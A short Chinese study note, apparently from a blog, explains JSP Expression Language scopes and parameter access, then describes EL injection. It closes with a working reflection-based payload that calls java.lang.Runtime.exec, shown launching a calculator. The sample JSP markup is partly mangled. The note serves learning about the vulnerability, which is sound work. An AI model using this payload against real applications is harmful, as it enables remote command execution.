学习了下 做个记录
什么是el表达式
Expression Language表达式语言
是一种在JSP页面获取数据的简单方式(只能获取数据,不能设置数据)
在JSP2.0开始引入概念
el表达式就是用来获取数据的,可从以下几个域获取属性
pagescope requestscope sessionscope applicationscope pagecontext
以上对象范围从小到大,其中pagecontext可获取page request session application,可谓域中的?
el表达式访问属性例子
el表达式param和paramvalues用法
param底层是调用request.getParameterparamvalues是调用request.getParameterValues${param["a"]}${param.a}
<%@ page contentType="text/html;charset=UTF-8" language="java" %><html><head> <title>Titletitle>head><body>name=${param["test"]}body>html>
el表达式注入
漏洞产生原因主要是表达式可由攻击者操作,导致攻击者可注入恶意代码
前面说了由于pagecontext域可操纵request session application,而这几个域里面均有setAttribute方法,可通过setAttribute方法创建一个值,值内容通过反射调用任意类,达到rce滴效果
例如通过反射java.lang.runtime.exec 达到命令执行的目的
name=${pageContext.session.setAttribute("test","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"open -a calculator"))}